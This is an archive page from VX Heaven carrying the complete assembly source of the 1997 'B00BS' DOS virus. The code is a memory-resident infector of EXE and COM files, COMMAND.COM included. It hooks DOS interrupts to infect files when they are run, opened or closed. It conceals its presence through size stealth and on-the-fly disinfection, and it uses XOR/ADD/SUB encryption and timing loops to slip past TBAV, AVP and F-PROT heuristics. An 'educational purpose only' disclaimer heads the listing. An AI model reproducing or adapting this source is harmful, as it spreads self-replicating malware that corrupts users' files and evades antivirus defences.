Maximize
Bookmark

VX Heaven

Library Collection Sources Engines Constructors Simulators Utilities Links Forum

Source code of computer viruses

Boobs

Virus for Windows

Bari
Show all viruses by this author

Description and download

1997-00-00

boobs.asm

[Turn off syntax highlighting]
; B00bs virus
;******************************************************************************
; THIS IS FOR EDUCATIONAL PURPOSE ONLY                               Gi0rGeTt0
;
; Virus name    : B00BS
; Author        : Unknwon :)
; Group         : iKx
; Origin        : Italy 1996/97
; Compiling     : Use TASM
;                 TASM /M2 B00BS.ASM
;                 TLINK B00BS
; Targets       : EXE COM
; Features      : stealth via 11h,12h,4eh,4fh,disinfect and infect on the fly
;                 on opening(3dh,6c00h) and closing(3eh) ,int 24h handler
;                 TSR by MCB and int21h (48h)
;                 uses some 386 instructions for some routines (just for fun)
;                 fucks TBAV,AVP,F-PROT heuristic shits
; improvements  : needs a poly engine
; payload       : none
; Greetings     : to all the guys of the iKx and all the
;                 other guys on #virus.
;
;******************************************************************************
;
; The file is a EXE
 
 
.386
 
CSeg SEGMENT USE16
 
ASSUME cs:CSeg
 
FileHeaderRecord struc
		  signature  dw ?
		  sizemod    dw ?
		  msize      dw ?
		  relocat    dw ?
		  headsize   dw ?
		  minalloc   dw ?
		  maxalloc   dw ?
		  stackseg   dw ?
		  stackofs   dw ?
		  check      dw ?
		  ip         dw ?
		  codes      dw ?
		  Checksum   dw ?
		  checkOvr   dw ?
 
FileHeaderRecord ends
 
SearchRecord  struc
	       date    dw ?
	       time    dw ?
SearchRecord  ends
 
ExecBlockRecord struc
		 Env dw ?
		 Cmd dd ?
ExecBlockRecord ends
 
Findrecord struc
	    FindBuf db 128 dup (?)
	    Findofs dw ?
Findrecord ends
 
VIR_PAR = ((END_TSR - START_TSR ) / 16) + 2
VIR_LEN = (REAL_CODE - START_TSR) + 1        ; dim virus in memoria
VIR_TRUE_LEN = ( REAL_CODE - START_TSR ) + 1 ; dimensione del virus su file
 
 
already  =  0 ; already infected
ready    =  1 ; ready to be infected
com      =  2 ; com file
exe      =  3 ; exe file
other    =  4 ; other
 
true     =  1
false    =  0
 
maxfiles = 26         ; max file no to open , must be (maxfiles*2)/4 integer
 
START_TSR     equ $
 
AfterCryp :  call SH
SH        :  pop bp
	     sub bp,3
 
	     push ds
	     pop  es
 
	     mov ax,0fe01h
	     int 2fh
 
	     cmp al,0ffh
	     jne short  Novirus
 
YesVirus :   db 0e9h
	     jmp_addr dw ?
 
	     mov ax,ds                                 ; ES = DS = PSP = AX
	     add ax,10h                                ; PSP +  1 paragraph
	     mov bx,cs:[bp][templateheader.stackseg]
	     add bx,ax
	     cli
	     mov ss,bx
	     mov sp,cs:[bp][templateheader.stackofs]
	     sti
 
	     mov bx,cs:[bp][templateheader.codes]
	     add bx,ax
 
	     push bx                                   ; push CS
	     push cs:[bp][templateheader.ip]           ; push IP
 
@jump  :     xor eax,eax
	     xor ebx,ebx
	     xor ecx,ecx
	     xor edx,edx
	     xor esi,esi
	     xor edi,edi
	     xor ebp,ebp
 
	     retf                                      ; jmp to host CS:IP
 
com_exec :   push cs                                   ; COM settings
	     mov si,bp
	     add si,offset @com_buf
	     mov di,100h
	     push di
	     cld
	     movsd
	     jmp short @jump
 
 
NoVirus  :   mov es,word ptr ds:[2ch]                  ; enviroment segment
	     mov word ptr cs:[bp][tmp_COMseg],es
 
	     push ds
 
	     mov ax,ds                                    ; DS = PSP
	     dec ax                                       ; AX = MCB
	     mov ds,ax
 
	     mov  bl,02h                 ; last fit
	     mov  ax,5801h
	     int  21h                    ; set
 
	     mov  bx,VIR_PAR             ; malloc
	     mov  ah,48h
	     int  21h
	     jnc  short malloc           ; problems ?
 
	     push ax dx
	     mov ah,2
	     mov dl,7
	     int 21h
	     pop dx ax
 
	     push ds
	     pop  ax
 
	     mov bx,4d03h
	     mov ds:[0],bh                                         ;'M'
	     xor bh,bh
	     sub word ptr ds:[bx],VIR_PAR
	     inc ax
	     add ax,ds:[bx]
	     mov ds,ax
	     mov word ptr ds:[bx],VIR_PAR-1
	     mov bl,'Z'
             mov ds:[0],bl                                   ; Z in last MCB
 
	     inc ax
 
malloc :     mov  es,ax
 
	     dec ax
	     push ax
	     pop  ds
 
	     mov  bx,8
	     mov  ds:[1],bx                               ; owned by dos 0008
	     mov  word ptr ds:[bx],'CS'
 
	     xor bl,bl                                    ; restore strategy
	     mov  ax,5801h
	     int  21h
 
	     cld
	     xor di,di
	     mov si,bp
	     push cs
	     pop  ds
	     mov cx,(VIR_LEN / 4) + 1
rep          movsd
 
	     call clean_x_stack
 
	     cli
 
	     xor ax,ax
	     mov ds,ax
 
	     mov eax,es
	     shl eax,16
	     mov ax,offset HOOK_21
	     xchg ds:[84h],eax
	     mov es:TRAPPED_21,eax
 
	     mov eax,es
	     shl eax,16
	     mov ax,offset HOOK_2F
	     xchg ds:[0bch],eax
	     mov es:TRAPPED_2F,eax
 
	     pop ds                                ; DS = PSP
 
	     mov es:sleep,FALSE
	     mov es:command_Flag,TRUE
	     mov ax,cs:[bp][tmp_COMseg]
	     mov es:COMseg,ax
 
	     push ds
	     pop  es
 
	     sti
 
	     jmp yesvirus
 
	     tmp_COMseg dw ?
 
HOOK_2F  :   cmp ah,0feh
	     jne short  ChkintWin
	     mov al,0ffh
	     iret
 
;///// Chkintwin and ChkEndwin disable the virus during installation check in
;      win311 and under Msdos prompt in w95 /////
 
;      Under Msdos prompt only some int21h trap worked :(( i.e 4b
;      but 3dh,3eh and some other as all long filenames functions didn't work
;      i dunno the reason since i hadn't much time for solving the question
;      if someone can explain it let me know pleaze :)
 
ChkintWin :  cmp ax,1605h
	     jne short chkendwin
	     mov cs:sleep,TRUE
	     jmp short pass2f
 
ChkEndWin :  cmp ax,1606h
	     jne short pass2f
	     mov cs:sleep,FALSE
 
pass2f    :  db 0eah
	     TRAPPED_2F dd ?
 
HOOK_21 :    cmp cs:command_flag,TRUE
	     jne short Check_int
	     call @COMM_COM
 
Check_int :  cmp cs:sleep,TRUE
	     je short org_21
 
	     cmp ax,cs:[intr_sub_w]                                   ;4b00h
	     je @EXEC00
	     cmp ax,cs:[intr_sub_w+2]                                 ;4b01h
	     je @LD&EX
 
	     cmp ah,cs:[intr_sub_b]                                   ;1ah
	     je @SAVEDTA
	     cmp ah,cs:[intr_sub_b+1]                                 ;4eh
	     je @FINDFIRST
	     cmp ah,cs:[intr_sub_b+2]                                 ;4fh
	     je @FINDNEXT
 
	     cmp ah,cs:[intr_sub_b+3]                                 ;3dh
	     je @OPEN
	     cmp ah,cs:[intr_sub_b+4]                                 ;3eh
	     je @CLOSE
 
	     cmp ax,cs:[intr_sub_w+4]                                 ;6c00h
	     je @EXTOPEN
 
	     cmp ah,cs:[intr_sub_b+5]                                 ;11h
	     je @FCB_FIND
	     cmp ah,cs:[intr_sub_b+6]                                 ;12h
	     je @FCB_FIND
 
 
org_21    :  db 0eah
	     TRAPPED_21 dd ?
 
@COMM_COM :  pushad
	     push ds es
 
	     cld
	     mov ax,cs:COMseg
	     mov es,ax
	     xor di,di
	     mov cx,256
 
@pre_loop :  mov eax,'SMOC'
@loop_a   :  scasd
	     jz short @nxt_ck
	     sub di,3
	     loop @loop_a
 
	     jmp @fail
 
@nxt_ck :    mov eax,'=CEP'
	     scasd
	     jz short @it_is
	     sub di,3
	     jmp short @pre_loop
 
@it_is :     push es
	     pop  ds
	     mov  si,di
	     push cs
	     pop  es
	     mov  di,offset Data_Buffer
 
	     mov cx,256
 
@loop_b  :   lodsb
	     or al,al
	     jz short @copy_end
	     stosb
	     loop @loop_b
@copy_end :  stosb
 
	     push cs
	     pop  ds
             mov  dx,offset Data_Buffer               ; DS:DX command.com path
	     mov  bx,dx
 
	     call GetFattrib                          ; CX attributo
	     jc short @fail
 
	     push cx dx ds
 
	     call openfile                            ; BX handle
 
	     call FileInfect
 
	     call closefile
 
	     pop ds dx cx
 
	     call SetFattrib
 
@fail :      pop  es ds
	     popad
 
	     mov cs:command_flag,FALSE
 
	     ret
 
@EXEC00   :  call CheckIfExe
	     jnz org_21
 
	     pushad
	     push es ds                                 ; DS:DX ASCIZ filename
 
	     call vir_handler
 
	     call getFattrib
	     jc short @no_inf                           ; CX attributo
 
	     push cx ds dx
 
	     call openfile
 
	     call FileInfect
 
	     call closefile
 
	     pop dx ds cx
 
	     call SetFattrib
 
@no_inf  :   call dos_handler
 
	     pop  ds es
	     popad
 
	     call int21h
 
	     jmp Intret
 
 
@LD&EX   :   push es ds
	     pushad
 
	     call vir_handler
 
	     call GetFattrib
	     jc short  ex_ld                          ; CX attributo
 
	     push cx dx ds
 
	     call OpenFile
	     jc short ex_ld
 
	     call FileClean
 
	     call closefile
 
	     pop ds dx cx
 
	     call SetFattrib
 
ex_ld  :     call dos_handler
 
	     popad
	     pop ds es
 
	     push ds dx
	     call int21h
	     pop  dx ds
 
	     pushf
	     push es ds
	     pushad
 
	     call vir_handler
 
	     call GetFattrib
	     jc short  not_ld                             ; CX attrib
 
	     push cx ds dx
 
	     call OpenFile
 
	     call FileInfect
 
	     call closefile
 
	     pop dx ds cx
 
	     call SetFattrib
 
not_ld :     call dos_handler
 
	     popad
	     pop ds es
	     popf
	     jmp Intret
 
 
@OPEN    :   call CheckIfExe
	     jnz org_21
 
	     push es ds
	     pushad
 
	     call vir_handler
 
	     call GetFattrib
	     jc short  Skip_file                           ; CX attrib
 
	     push cx ds dx
 
	     call OpenFile
 
	     call FileClean
 
	     call CloseFile
 
	     pop dx ds cx
 
	     call SetFattrib
 
	     call dos_handler
 
	     popad
	     pop ds es
 
	     push ds dx
	     call int21h
	     pop  dx ds
	     jc short @no_open
 
	     xchg ax,bx
	     call PushHandle
	     xchg bx,ax
	     jmp Intret
 
@no_open   : pushf
	     cmp al,5
	     jne short @no_mat
 
	     push es ds
	     pushad
 
	     call vir_handler
 
	     call GetFattrib
	     jc short @a
 
	     push cx ds dx
 
	     call OpenFile
 
	     call FileInfect
 
	     call CloseFile
 
	     pop dx ds cx
 
	     call SetFattrib
 
	     call dos_handler
 
@a      :    popad
	     pop ds es
 
@no_mat    : popf
	     jmp Intret
 
Skip_file  : popad
	     pop ds es
 
	     call dos_handler
 
	     jmp org_21
 
@EXTOPEN   : xchg si,dx
	     call CheckIfExe
	     xchg dx,si
	     jnz org_21
 
	     push es ds
	     pushad
 
	     call vir_handler
 
	     mov dx,si
 
	     call GetFattrib
	     jc short @aa
 
	     push cx ds dx
 
	     call OpenFile
 
	     call FileClean
 
	     call closefile
 
	     pop  dx ds cx
 
	     call SetFattrib
 
@aa   :      call dos_handler
 
	     popad
	     pop ds es
 
	     push ds si
	     call int21h
	     pop  dx ds
	     jc @no_open
 
	     xchg ax,bx
	     call PushHandle                                    ; save handle
	     xchg bx,ax
 
	     jmp Intret
 
 
; // SFT and JFT didn't work in Msdos Prompt :(( //
 
@CLOSE     : call Pophandle
	     jc org_21
 
	     call vir_handler
 
	     pushad
	     push ds es
 
	     push bx
 
	     mov ax,1220h                                ; BX handle
	     call int2fh                                 ; ES:DI JFT
 
	     xor bx,bx
	     mov bl,byte ptr es:[di]
	     mov ax,1216h                                ; bx entry number for
	     call int2fh                                 ; ES:DI SFT
 
	     mov byte ptr es:[di+2],2
 
	     pop  bx
 
	     call FileInfect
 
	     pop es ds
	     popad
 
	     call int21h                                  ; exec int
 
	     call dos_handler
 
	     clc
	     jmp Intret
 
 
@FINDFIRST : push ax cx si di es                         ; DS:DX find filename
	     pushf
 
	     mov si,dx
 
	     push cs
	     pop  es
	     mov  di,offset findvar
 
	     cld
	     push di
	     xor ax,ax
	     mov cx,(size Findvar - 2) / 2
	     rep stosw                                  ; reset Findvar
	     pop di
 
	     mov ah,60h                                 ; DS:SI filename
	     call Int21h                                ; ES:DI canonaized
 
	     mov di,offset findvar + size findvar - 2
	     mov cx,size findvar - 2 - 1
 
	     std
	     mov al,''
repnz        scasb
	     jz short o
	     sub di,3
o :          add di,2
	     mov cs:Findvar.Findofs,di
	     popf
	     pop  es di si cx ax
 
@FINDNEXT :  call int21h
	     jc Intret
 
FindProc :   pushad
	     push ds es
	     pushf
 
	     mov ds,cs:DTAseg
	     mov si,cs:DTAofs
	     add si,1eh                                  ; DS:SI punta al
							 ; filename nella DTA
	     push cs
	     pop  es
 
	     mov  di,cs:findvar.findofs                  ; ES:DI path filename
	     cld
 
CopyName:    movsb
	     cmp byte ptr ds:[si],0
	     jne short  CopyNAme
	     mov byte ptr es:[di],0
 
;  Findvar now has the ASCIZ filename to pass to Openfile
 
	     push cs
	     pop  ds
	     mov  dx,offset Findvar
 
	     call CheckIfExe
	     jnz short  DonotTreat
 
	     call OpenFile
	     jc short  DoNotTreat
 
	     call CheckXinf
 
	     cmp file_type,other
	     je short CanClose
 
	     cmp file_status,already
	     jne short  CanClose
 
	     mov es,DTAseg
	     mov di,DTAofs
 
	     sub dword ptr es:[di+1ah],vir_true_len - 1
 
CanClose :   call CloseFile
 
DoNotTreat:  popf
	     pop  es ds
	     popad
	     jmp Intret
 
 
@SAVEDTA :   mov  cs:DTAofs,dx
	     mov  cs:DTAseg,ds
	     jmp org_21
 
 
@FCB_FIND :  call int21h
 
	     pushf
	     push es ax bx
 
	     les bx,dword ptr cs:DTAofs
 
	     mov al,byte ptr es:[bx]
	     cmp al,0ffh                             ; vede se FCB esteso
	     jne short @ok_good
	     add bx,7
 
@ok_good :   pusha
	     push ds es
 
	     mov ah,47h                              ; get cur dir
	     mov dl,byte ptr es:[bx]                 ; drive number
	     push cs
	     pop  ds
	     mov si,offset FindVar
	     call int21h                             ; return ASCIZ directory
 
	     push cs
	     pop  es
	     cld
 
	     cmp byte ptr ds:[si],0                  ; root ?
	     jne short @path
	     mov ax,offset FindVar
	     add ax,3
	     mov cs:FindVar.FindOfs,ax
	     jmp short @root
 
@path  :     mov di,offset FindVar
	     xor al,al
@@f    :     scasb                          ; look for the end of the dirname
	     jnz short @@f
 
	     mov si,di
	     dec si
	     mov byte ptr es:[si],''
	     add di,3
 
	     mov es:FindVar.FindOfs,di
	     dec di
	     std
@cp :        movsb
	     cmp si,offset FindVar
	     jae short @cp
 
@root :      mov word ptr es:[offset FindVar+1],':'
	     add dl,'A' - 1
	     mov byte ptr es:[offset FindVar],dl           ; drive letter
 
	     pop es ds
	     popa
 
	     pusha
	     push ds es                              ; ES:BX DTA
 
	     push es
	     pop  ds                                 ; DS = ES
	     mov  si,1
	     add  si,bx                              ; file name ds:si
 
	     push cs
	     pop  es
	     mov  di,cs:FindVar.FindOfs
 
	     mov cx,8
	     cld
 
@lp1 :       lodsb
	     cmp al,20h
	     je short @end_1
	     stosb
	     loop @lp1
 
@end_1 :     mov al,'.'
	     stosb
 
	     mov cx,3
	     mov si,9
	     add si,bx
	     rep movsb
 
	     xor al,al
	     stosb                                       ; Z terminated
 
	     push cs
	     pop  ds
	     mov  dx, offset FindVar                      ; ASCIZ filename
 
	     mov bp,bx
 
	     call CheckIfExe
	     jnz short  @not_op
 
	     call OpenFile
	     jc short  @not_op
 
	     call CheckXinf
 
	     cmp file_type,other
	     je short @CanClose
 
	     cmp file_status,already
	     jne short @CanClose
 
	     mov es,cs:DTAseg
	     sub dword ptr es:[bp+1dh],VIR_TRUE_LEN - 1       ; real size
 
@CanClose :  call CloseFile
 
@not_op  :   pop es ds
	     popa
 
 
@NotInf   :  pop  bx ax es
	     popf
 
Intret       proc
	     cli
	     push ax
	     pushf
	     pop ax
	     add sp,8
	     push ax
	     sub sp,6
	     pop ax
	     sti
	     iret
Intret       endp
 
 
int21h       proc
 
	     pushf
	     call dword ptr cs:TRAPPED_21
	     ret
 
int21h       endp
 
int2fh       proc
 
	     pushf
	     call dword ptr cs:TRAPPED_2F
	     ret
 
int2fh       endp
 
vir_handler  proc
 
	     cli
	     push eax ds
	     xor ax,ax
	     mov ds,ax
	     mov eax,cs
	     shl eax,16
	     mov ax,offset critical
	     xchg ds:[90h],eax
	     mov cs:TRAPPED_24,eax
	     pop ds eax
	     sti
	     ret
 
vir_handler  endp
 
dos_handler  proc
 
	     push ds ax
	     cli
	     xor ax,ax
	     mov ds,ax
 
	     db 66h
	     dw 06c7h
	     dw 0090h
	     TRAPPED_24 dd ?                      ; mov ds:[90h],cs:TRAPPED_24
 
	     pop ax ds
	     sti
	     ret
 
dos_handler  endp
 
 
critical     proc
	     xor al,al
	     iret
critical     endp
 
 
openfile     proc
 
	     mov ah,3dh
	     xor al,al
	     add al,2
	   ;  mov  ax,3d02h
	     call int21h
	     mov bx,ax
	     ret                                             ; out : BX handle
 
openFile     endp
 
closeFile    proc
 
	     mov ah,3eh                                      ; in  : BX handle
	     call int21h
	     ret
 
closefile    endp
 
GetFAttrib   proc
 
	     push ax
	     mov ah,43h
	     xor al,al
	  ;   mov ax,4300h
	     push ax
	     call int21h                              ; CX attributo
	     pop ax
	     inc al
	     push cx
	    ; mov ax,4301h
	     push ax
	     call int21h
	     pop ax
	     jc short out_f
	   ;  mov ax,4301h
	     mov cx,32
	     call int21h
out_f   :    pop cx
	     pop ax                                   ; ritorna CX attributo
	     ret                                      ; ritona carry se errore
 
SetFattrib   proc
	     push ax                                  ; in CX attributo
	     mov ah,43h
	     xor al,al
	     inc al
	   ;  mov ax,4301h
	     call int21h
	     pop  ax
	     ret
SetFattrib   endp
 
GetFAttrib   endp
 
FileEnd      proc
	     mov ah,42h
	     xor al,al
	     add al,2
	  ;   mov ax,4202h
	     xor cx,cx
	     xor dx,dx
	     call int21h                    ; DX:AX file size
	     ret
 
FileEnd      endp
 
Filestart    proc
 
	     xor cx,cx
	     xor dx,dx
 
Filestart    endp
 
FileSeek     proc
 
	     mov ax,4200h
	     call int21h
	     ret
 
FileSeek     endp
 
blockread    proc
 
	     mov  ah,3fh
	     call int21h
	     ret
 
blockread    endp
 
blockwrite   proc
 
	     mov  ah,40h
	     call int21h
	     ret
 
blockwrite   endp
 
GetDateTime  proc
 
	     mov ah,57h
	     xor al,al
	  ;   mov ax,5700h
	     call Int21h
	     mov cs:searchrec.date,dx
	     mov cs:searchrec.time,cx
	     ret
 
GetdateTime  endp
 
SetDateTime  proc
 
	     mov dx,cs:searchrec.date
	     mov cx,cs:searchrec.time
	     mov ah,57h
	     xor al,al
	     inc al
	   ;  mov ax,5701h
	     call Int21h
	     ret
 
SetdateTime  endp
 
commit_file  proc
 
	     mov ah,68h
	     call int21h                                        ; commit file
	     ret
 
commit_file  endp
 
clean_x_stack proc
 
	      mov di,offset searchstack
	      mov cx, (size searchstack) / 4
	      xor eax,eax
rep           stosd
	      ret
 
clean_x_stack endp
 
 
CheckIfExe   proc                                 ; DS:DX filename
 
	     push es di ax
 
	     push ds
	     pop  es
 
	     cld
	     mov di,dx                           ; ES:DI filename
	     xor ax,ax
FindZ    :   scasb
	     jnz short  FindZ
 
	     cmp dword ptr [di-5],'exe.'
	     je short is_exe
	     cmp dword ptr [di-5],'EXE.'
	     je short is_exe
	     cmp dword ptr [di-5],'moc.'
	     je short is_exe
	     cmp dword ptr [di-5],'MOC.'
 
is_exe   :   pop ax di es
	     ret
 
CheckIfExe   endp
 
PushHandle    proc
 
	      pushf
	      push ax cx es di
 
	      push cs
	      pop  es
	      mov  di,offset SearchStack            ; ES:DI SearchStack
	      cld
	      mov cx,maxfiles
	      xor ax,ax
repnz         scasw
	      jnz short  Nofree
	      mov word ptr es:[di-2],bx             ; sets handle
 
Nofree:       pop di es cx ax
	      popf
	      ret
 
PushHandle    endp
 
PopHandle     proc
 
	      push ax cx es di
 
	      or bx,bx
	      jz short  Nofree1                              ; BX = 0 ?
 
	      push cs
	      pop  es
 
	      cld
	      mov di,offset SearchStack
	      mov cx,maxfiles
	      mov ax,bx
repnz         scasw
	      jnz short Nofree1
	      mov word ptr es:[di-2],0                 ; free handle
	      clc
	      jmp short  exitpop
 
Nofree1  :    stc
Exitpop  :    pop di es cx ax
	      ret
 
PopHandle     endp
 
 
Calc_check   proc
 
	     push si                                     ; DS = CS
 
	     xor dx,dx
	     mov si,size fileheader - 4
@chk   :     add dx,[si+offset fileheader]
	     sub si,2
	     jnz short @chk
 
	     pop si                                      ; DX = checksum
	     ret
 
Calc_check   endp
 
CheckXinf    proc
 
	     mov file_status,already
 
	     call Filestart
 
	     mov cx,size Fileheader
	     mov dx, offset Fileheader
	     call BlockRead
 
	     mov cx,cs:[MZsig]
	     dec cx
	     cmp fileheader.signature,cx
	     je short  IsanExe
	     mov cx,cs:[ZMsig]
	     dec cx
	     cmp fileheader.signature,cx              ; vede se e' un file EXE
	     je  short IsanExe
 
	     mov file_type,com
 
	     call FileEnd                             ; DX:AX dim file
 
	     sub ax,VIR_TRUE_LEN - 1
	     add ax,NONCRYPTED - START_TSR
	     sub ax,3
 
	     cmp ax,word ptr fileheader.signature+1
	     je GotoEnd                               ; infected
 
	     jmp Except
 
IsAnExe   :  mov file_type,exe
 
	     cmp fileheader.Checksum,40h
             jne short @good                        ; not a PE,NE,LE ....
	     mov file_type,other
	     jmp GotoEnd
 
@good  :     call calc_check
 
	     cmp dx,fileheader.CheckOvr
	     je GoToEnd                             ; already infected
 
Cont :       call FileEnd                           ; DX:AX dimens file
 
	     shl edx,16
	     mov dx,ax
 
	     movzx edi,fileheader.msize
	     movzx esi,fileheader.sizemod
	     dec edi
	     imul edi,512
	     add edi,esi
 
	     cmp edi,edx                             ; malloc = filesize
	     je short Except
 
;//**** SFT and JFT doesnt work in dos7 prompt from w95 :((        ****** ///
;//**** This is used for infecting COMMAND.COM under dos7 which is not a .COM
;//**** file but a real EXE
 
Chk_Com :    push bx es
 
	     mov ax,1220h                                ; BX handle
	     call int2fh                                 ; ES:DI JFT
 
	     xor bx,bx
	     mov bl,byte ptr es:[di]
	     mov ax,1216h                                ; bx entry number for
	     call int2fh                                 ; ES:DI SFT
 
	     cld
	     add di,20h                                  ; go to filename
 
	     mov eax,'MMOC'
	     scasd
	     jnz short no_com_com
	     mov eax,' DNA'
	     scasd
	     jnz short no_com_com
	     mov ax,'OC'
	     scasw
no_com_com : pop  es bx
	     jz short except
 
	     mov file_type,other
	     jmp short GotoEnd
 
except :     mov file_status,ready
 
GoToEnd  :   call FileEnd
	     ret
						     ; DX:AX dimensione file
CheckXinf    endp
 
 
FileInfect   proc
 
	     push cs cs
	     pop  ds es
 
	     call CheckXInf                         ; DX:AX dimens file
 
	     cmp file_type,other
	     je Infectexit
 
	     cmp file_status,ready
	     jne infectexit
 
	     cld
	     mov word ptr f_size,ax                 ; salva dim per .COM
	     mov si,offset fileheader
	     mov di,offset @com_buf
	     movsd
 
	     cmp dx,0
	     ja short @not_less
 
	     cmp ax,23000
	     ja short @not_less
 
	     jmp infectexit
 
@not_less :  cmp dx,7
	     ja Infectexit
 
	     cld
	     mov si,offset fileheader + 2
	     mov di,offset templateheader + 2
	     mov cx,(size fileheader) / 2  - 1
rep          movsw
 
	     push ax dx
	     add ax,VIR_TRUE_LEN
	     adc dx,0
	     mov cx,512
	     div  cx
 
	     inc ax                                 ; AX = quoziente  DX=resto
	     mov fileheader.msize,ax                ; nuova memory size
	     mov fileheader.sizemod,dx              ; nuovo memory module
	     pop  dx ax
 
	     add ax,NONCRYPTED - START_TSR
	     adc dx,0
 
	     mov cx,16
	     div cx                                 ; AX:DX = CS:IP
 
	     mov fileheader.ip,dx
 
	     push ax
 
	     xor dx,dx
	     mov ax,VIR_TRUE_LEN
	     add ax,cx
	     add fileheader.ip,ax
	     mov cx,16
	     div cx
 
	     sub fileheader.ip,dx
 
	     mov dx,fileheader.ip
 
	     dec dx
	     mov first_addr,dx
	     sub dx,NONCRYPTED - START_TSR
	     mov cmp_addr,dx
 
	     mov dx,ax
 
	     pop  ax
 
	     sub ax,dx
 
	     sub ax,fileheader.headsize
	     mov fileheader.codes,ax                    ; setta CS:IP nuovi
	     mov fileheader.stackseg,ax
	     add fileheader.stackofs,(VIR_PAR + 4) * 16 ; mi metto al sicuro
 
	     call GetDateTime
 
	     call calc_check                            ; dx checksum
	     mov  fileheader.checkovr,dx
 
LeaveSo   :  call FileStart
 
	     cmp file_type,com
	     jne @exe1
 
	     mov jmp_addr,offset com_exec - offset yesvirus - 3
 
	     mov byte ptr fileheader,0e9h
	     mov cx,f_size
	     add cx,NONCRYPTED - START_TSR
	     sub cx,3
	     mov word ptr fileheader+1,cx
	     add cx,102h
	     mov first_addr,cx
	     sub cx,NONCRYPTED - START_TSR
	     mov cmp_addr,cx
 
	     mov dx,offset FIleheader
	     mov cx,3
	     call BlockWrite
 
	     jmp short ordinary
 
@exe1     :  mov jmp_addr,0
 
	     mov dx,offset Fileheader
	     mov cx,size fileheader
	     call BlockWrite                             ; scrive header
 
ordinary   : call FileEnd
 
	     call Criptate                               ; return CX =
							 ; virus lenght
	     mov dx,offset Data_Buffer
	     mov cx,VIR_TRUE_LEN - 1
	     call BlockWrite
 
	     call SetDateTime
 
	     call commit_file
 
InfectExit : ret
 
FileInfect   endp
 
FileClean    proc
 
	     push cs
	     pop  ds
 
	     call CheckXInf                            ; DX:AX dimens file
 
	     cmp file_type,other
	     je clean_out
 
	     cmp file_status,already
	     jne clean_out
 
	     sub ax,size templateheader + 4              ;size @com_buf
	     sbb dx,0
 
	     mov cx,dx
	     mov dx,ax
	     call FileSeek
 
             mov cx,size templateheader + 4     ;size @com_buf
                                                ; read real fileheader
	     mov dx,offset @com_buf
	     call Blockread
 
	     call FileStart
	     call GetdateTime
 
	     cmp file_type,com
	     jne short @exe2
 
	     mov cx,4
	     mov dx,offset @com_buf
	     call Blockwrite
	     jmp short ordinary1
 
@exe2  :     mov cx,cs:[MZsig]
	     dec cx
	     mov templateheader.signature,cx
	     mov dx,offset templateHeader
	     mov cx,size templateheader
	     call BlockWrite
 
ordinary1 :  call fileEnd
 
	     sub ax,vir_true_len - 1
	     sbb dx,0
 
	     mov cx,dx
	     mov dx,ax
	     call FileSeek
 
	     xor cx,cx
	     call Blockwrite
 
	     call SetDateTime
 
	     call commit_file
 
clean_out :  ret
 
FileClean    endp
 
Criptate     proc
 
	     push bx
 
	     xor  bx,bx
	     mov  ds,bx
             mov  bx,word ptr ds:[46ch]         ; ritorna numero casuale
 
	     push cs cs
	     pop  ds es
 
	     mov  k_code,bl
	     mov  k1_code,bl
 
	     mov si,bx
	     and si,3
	     cmp si,3
	     jl short @well
	     xor si,si
 
@well   :    mov bh,byte ptr [offset cripstyle+si]
	     mov cripmode,bh
	     mov bh,byte ptr [offset uncripstyle+si]
	     mov uncripmode,bh
 
	     std
	     mov  si,offset NONCRYPTED - 1
	     mov  di,offset  Data_Buffer + (NONCRYPTED - START_TSR) - 1
@crip :      bt si,15
	     jc short @stop
	     lodsb
 
	     cripmode db ?
	     k_code db   ?                             ; xor add sub ,k_code
 
	     stosb
	     jmp short @crip
 
@stop    :   cld
	     mov si,offset @uncr_code
	     mov di,offset offset  Data_Buffer + (NONCRYPTED - START_TSR)
	     mov cx,REAL_CODE - offset @uncr_code
	     rep movsb
 
	     pop bx
 
	     ret
Criptate     endp
 
Cripstyle     db  034h                                 ; xor
	      db  04h                                  ; add
	      db  02ch                                 ; sub
 
Uncripstyle   db  34h                                  ; xor
	      db  2ch                                  ; sub
	      db  04h                                  ; add
 
Message db '|||-(BOOBS-)||| Virus , Once again deep in Terronia Land '
	db '1997 Bari'
 
intr_sub_w dw 4b00h,4b01h,6c00h
intr_sub_b db 1ah,4eh,4fh,3dh,3eh,11h,12h
MZsig dw 'ZM'+1
ZMsig dw 'MZ'+1
 
NONCRYPTED   equ $
 
@uncr_code : db 0beh
	     first_addr dw ?                             ; mov si,first_addr
 
@uncr  :     db 02eh                                     ; xor cs:[si]
	     db 80h
	     uncripmode db ?
	     k1_code  db ?
 
	     mov cx,4000                                 ; do-nothing loop
@m1:         inc si                                      ; to waste time
	     dec si                                      ; to
	     loop @m1                                    ; fuck AVP
 
	     dec si
	     db 81h
	     db 0feh
	     cmp_addr dw ?                                ; cmp si,
 
	     jne short @uncr
 
@end   :     jmp AfterCryp
 
@com_buf db 4 dup (?)
templateheader FileheaderRecord <>                  ; real file header
 
REAL_CODE    equ $
 
Fileheader   FileheaderRecord <>                    ; header
file_status  db ?                                   ; infection flag
file_type    db ?
sleep        db ?                                   ; flag for Windows 3.X
command_flag db ?                                   ; infect command.com ?
Searchrec    Searchrecord <>                        ; date & time record
SearchStack  dw Maxfiles dup (?)                    ; stack for f-handle
FindVar      Findrecord <>                          ; findfirst & findnext
SFT          db 03bh  dup (0)                       ; System File Table Buffer
DTAofs       dw ?                                   ; DTA for Findfirst,next
DTASeg       dw ?
COMSeg       dw ?                                   ; SEG for command.com
f_size       dw ?                                   ; com size
Data_Buffer  db VIR_TRUE_LEN + 16  dup (?)          ; Virus temp buffer
 
 
END_TSR      equ $
 
 
main    :    mov ax,ds                                    ; DS = PSP
             dec ax                                       ; AX = MCB
	     mov ds,ax
 
	     mov byte ptr ds:[0],'M'
	     sub word ptr ds:[3],VIR_PAR
	     inc ax
	     add ax,ds:[3]
	     mov ds,ax
             mov byte ptr ds:[0],'Z'                      ; Z nell'ultimo MCB
	     mov word ptr ds:[1],0008
	     mov word ptr ds:[3],VIR_PAR-1
	     mov word ptr ds:[8],'CS'
 
             inc ax                                       ; SEG TSR
 
	     cld
	     mov es,ax
	     xor si,si
	     xor di,di
	     push cs
	     pop  ds
	     mov cx,(VIR_LEN / 4) + 1
rep          movsd
 
	     call clean_x_stack
 
	     cli
 
	     xor ax,ax
	     mov ds,ax
 
	     mov eax,es
	     shl eax,16
	     mov ax,offset HOOK_21
	     xchg ds:[84h],eax
	     mov es:TRAPPED_21,eax
 
	     mov eax,es
	     shl eax,16
	     mov ax,offset HOOK_2F
	     xchg ds:[0bch],eax
	     mov es:TRAPPED_2F,eax
 
	     mov es:sleep,FALSE
	     mov es:command_flag,FALSE
 
